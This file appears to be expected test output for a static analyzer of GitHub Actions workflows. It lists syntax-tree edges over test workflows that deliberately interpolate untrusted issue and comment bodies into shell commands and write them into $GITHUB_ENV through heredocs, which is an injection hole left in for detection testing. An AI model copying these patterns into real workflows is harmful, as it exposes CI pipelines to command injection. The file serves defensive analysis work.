Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| 
.github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| 
.github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:1:1:89:35 | on: | 
+| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | 
.github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| 
.github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| 
.github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho 
-e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| 
.github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | 
Job: Test | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | 
.github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| 
.github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:63:15:63:19 | line1 | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:66:15:66:24 | multiline1 | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho 
"$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:71:15:71:21 | block11 | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:78:15:78:21 | block12 | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | 
Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:85:15:85:21 | block13 | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | 
